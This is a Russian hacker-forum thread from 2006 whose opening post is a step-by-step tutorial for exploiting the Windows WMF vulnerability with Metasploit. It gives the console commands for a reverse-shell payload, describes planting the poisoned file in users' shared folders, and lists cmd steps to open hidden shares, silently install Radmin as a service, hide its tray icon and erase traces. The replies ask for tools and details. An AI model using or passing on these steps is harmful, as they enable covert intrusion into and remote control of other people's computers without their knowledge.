Авторские статьи WMF-баг Windows эксплуатация

Discussion in 'Статьи' started by -=lebed=-, 21 Jun 2006.

  1. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,980
    Likes Received:
    1,961
    Reputations:
    594
    Кто не слышал про WMF-баг, с помощью которого можно получить шелл-доступ к практически любому компьютеру использующему системную библиотеку для обработки WMF-файлов?
    Наверно многие, регулярно читающие ][ знают.
    Однако многие Win-пользователи, читающие журнал ][ не смогли его использовать по следующим причинам:
    1) Отсутствие доступа к никсовому шеллу на удалённом компьютере;
    2) Не знание, слабое знание других систем: FreeBSD, LINUX.
    Возникает вопрос зачем ломать WIN – компьютеры с никсовых шеллов?
    Почему, бы не протестировать эксплотит c WIN на WIN спросите вы?
    Не будем разбирать экзотические варианты по вышеуказанным причинам, типа установки под Virtual PC или WMWARE альтернативных систем, а также Cygwin (хотя без него не обойтись, смотри далее). Сделаем всё проще запустим перловый эксплотит в windows.
    На диске ][ #86 --- лежал пакет Fгаmеwork - но он для никсов!!!
    Xотя и в его составе есть сплоит ie_xp_pfv_metafile.pm На практике при запуске в Active perl for Win32 он не работает , точнее не работает весь пакет Metasploit Fгаmеwork 2.5
    Идём по ссылке http://www.metasploit.com/projects/Framework/downloads.html и скачиваем - “Metasploit fгаmеwork 2.5 Win32 Cygwin Installer”, запускаем MSFConsole , делаем ls exploits и с сожалением обнаруживаем что ie_xp_pfv_metafile.pm там нет!!! Вот облом, подумаете Вы..
    Где взять? Ответ прост на DVD ][ или скачать Metasploit ifгаmеwork 2.5 для никсов – в этом пакете он присутствует! То есть достаточно его перекопировать в папку exploits и пользуйтесь на здоровье!
    Вот так, для Win-пользователей всё упрощается.
    Всё протестировано на двух WIN_XP_SP2 в локальной сети и работает!!!
    Что делать дальше, когда Вы получили шелл-доступ с правами систем к удалённому компьютеру с WINDOWS зависит от Вашей фантазии.
    Для примера расскажу что можно сделать в локальной сети для пользы (точнее для упрощённого администрирования WIN-систем администратором).
    1. Удалённая скрытая установка RemoteAdminisrator
    (RA-система удалённого администрирования, типа удалённый рабочий стол).

    Не всегда есть доступ к компьютеру пользователя (компьютер занят пользователем, далеко и т. д.). Поэтому воспользуемся WMF – багом и поставим на его компьютер RA удалённо, по локальной сети.
    Как правило (у нас в локалке, например) каждый юзверь имеет расшареную папку разрешённую для записи и в основном пользуется стандартным проводником (никуда от него не деться – стандартная оболочка, используется в любой программе – файл\открыть файл\сохранить).
    Запускаем консоль MSFConsole ну а дальше как в ][ № ---, кто не читал, повторюсь
    msf > use ie_xp_pfv_metafile – будем использовать сплоит для WMF
    msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse – цепляем реверс-шелл для win32
    PAYLOAD -> win32_reverse
    msf ie_xp_pfv_metafile(win32_reverse) > set LHOST ххх.ххх.ххх.ххх – устанавливаем IP куда будет коннектится реверс-шелл
    LHOST -> xxx.xxx.xxx.xxx
    msf ie_xp_pfv_metafile(win32_reverse) > exploit – запускаем эксплоит
    [*] Starting Reverse Handler.
    [*] Waiting for connections to http://ххх.ххх.ххх.ххх:8080/ - Поднимается Web-сервер на ранее указанном адресе и ждёт подключений.

    Через IE на нашей системе зайдём на этот Web-сервер и опа… взломаем сами себя (ну это не страшно). В консоли сделаем exit и не будем над собой издеваться.
    Теперь зайдём в IE в Сервис\Свойства\Общие\Параметры…\Просмотр файлов…. И найдём ядовитый tiff-файл, содержащий шелл-код, имя файла будет что-то типа «M16R14KtkTuEys0Iqt9M4vqK3ny4Kh1vem[2].tiff»
    Остаётся скопировать этот файл в папку юзверя (предварительно подняв web-сервер ещё раз на своём компьютере) и ждать когда он откроет папку, содержащую наш ядовитый файл с шелл-кодом.

    Дождались соединения, юзверь в этот момент ничего не заметит, (если не посмотрит в процессы и не увидит там cmd.exe).
    Дальше зальём ему RA (предварительно упаковав в SFX-архив RA.exe сам r_server.exe и две необходимые библиотеки AdmDll.dll, raddrv.dll а так же reg-файл для скрытия иконки r_server`a в трее Hide_RA.reg – он меняет один ключ, вот его содержание:

    Windows Registry Editor Version 5.00
    [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
    "DisableTrayIcon"=hex:01,00,00,00
    Примечание:
    Для упаковки в SFX-архив (самораспаковывающийся архив) использовал WinRAR v. 3.2 со следующими параметрами:
    Path=.\%SystemRoot%\system32\
    SavePath
    Silent=1
    Overwrite=2
    Можете задать другие, но на мой взгляд это оптимальные.
    Далее в консоли (уже в консоли cmd) пишем:
    cd \ `перейти в корень диска
    cd %SystemRoot%\system32 `задаём текущую папку system32
    net share C$$=C: `расшариваем диск C: юзверя – он невидим в сетевом окружении
    net share D$$=D: `расшариваем диск D: тоже (не знаем где система стоит, может и на D:)
    copy /y \\имя компьютера_\Папка_RA\ra.exe %SystemRoot%\system32 `копируем архив RA в системную папку юзверя
    cmd /c ra.exe `распаковываем всё необходимое для установки r_server и запуска его в скрытом режиме
    r_server /install /silence `инсталлируем r_server.exe в скрытом режиме как службу
    reg import Hide_RA.reg `скрываем иконку r_server.exe в трее
    r_server /start /silence `запускаем скрытно службу r_server.exe
    `Всё r_server.exe ждёт подключений клиента…
    delete ra.exe `удаляем архив
    net share C$$ /delete `удаляем шары
    net share D$$ /delete
    exit `выходим из консоли cmd


    Можно включить в архив run.cmd файл вида:

    r_server /silence /install
    reg import Hide_RA.reg
    r_server /silence /start
    delete ra.exe
    net share C$$ /delete
    net share D$$ /delete
    exit

    тогда после: «cmd /c ra.exe» в консоли надо запустить на исполнение его, например так
    cmd /c run.cmd `инсталлируем и запускаем службу r_server, затем убираем следы
    exit `выходим из консоли cmd (шелла удалённого компьютера) в консоль MFS

    msf ie_xp_pfv_metafile(win32_reverse) > exploit `и так далее остальных юзверей…


    Все права защищены -=lebed=- (c)


    Вышла новая версия пакета для Win,
    качать тут: http://metasploit.com/tools/framework-2.6.exe
     
    #1 -=lebed=-, 21 Jun 2006
    Last edited: 25 Jan 2007
  2. Xex

    Xex Banned

    Joined:
    10 Jul 2005
    Messages:
    120
    Likes Received:
    41
    Reputations:
    7
    Я бы порекомендовал афтору - вводить читателей в курс дела, или линки на инфу давать, мне вот совершенно непонятно о чем речь.
     
  3. Mobile

    Mobile Elder - Старейшина

    Joined:
    18 Feb 2006
    Messages:
    1,224
    Likes Received:
    812
    Reputations:
    324
    А копирайты где?
     
  4. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,980
    Likes Received:
    1,961
    Reputations:
    594
    Статья моя, изначально опубликована на ксакеп.ру, после чего я там был забанен на форуме...
    Нужен копирайт, пожалуйста:
    Все права защищены -=lebed=- (c)
    P.S. Прочитал тут мега FAQ по Radmin, (уже после), не думайте что инфа от туда получена мной для этой статьи, многое я знал уже давно, прописывание правил для RA в настройки стандартного файрвола XP через cmd - то, что надо!
     
    #4 -=lebed=-, 22 Jun 2006
    Last edited: 25 Jan 2007
  5. NeuRonix

    NeuRonix Elder - Старейшина

    Joined:
    5 Mar 2006
    Messages:
    36
    Likes Received:
    21
    Reputations:
    8
    Если статья твоя надо было постить в наши статьи, а не в чужие.
     
  6. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,980
    Likes Received:
    1,961
    Reputations:
    594
    Ну кто знал, то что надо туда, сюда безопаснее, а то скажут плагиат с xakep.ru.
    Хотя тут она в оригинале (без всяких исправлений модером) и я могу её если что отредактировать, подправить, продолжить, вообщем кулл!
     
  7. МиФкА

    МиФкА New Member

    Joined:
    26 Jun 2006
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    де мона достать прогу для получения шел-доступа?напишите мне вприват пожалуйста!заранее благодарю!
     
  8. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,980
    Likes Received:
    1,961
    Reputations:
    594
    Тут: http://www.metasploit.com
     
  9. теща

    теща Экстрасенс

    Joined:
    14 Sep 2005
    Messages:
    2,106
    Likes Received:
    492
    Reputations:
    285
    вчера пробовал етот способю, не канает ((
     
  10. Romk

    Romk New Member

    Joined:
    11 Oct 2007
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    а можно поподробнее как провернуть вот это дело начиная с вот этого момента и до конца:
    Дождались соединения, юзверь в этот момент ничего не заметит, (если не посмотрит в процессы и не увидит там cmd.exe).........
    я что то не поиму немного....

    Поподробнее - кликни Metasploit Framework "Найти статьи" у меня в подписи.
    ЗЫ Археолог, откопал мою первую статью
    :D (-=lebed=-)

    Тема закрыта, так как давняя, кроме того есть ещё 5 шт. по Metasploit'y ссылки у меня в подписи.
     
    #10 Romk, 11 Oct 2007
    Last edited by a moderator: 12 Oct 2007
Loading...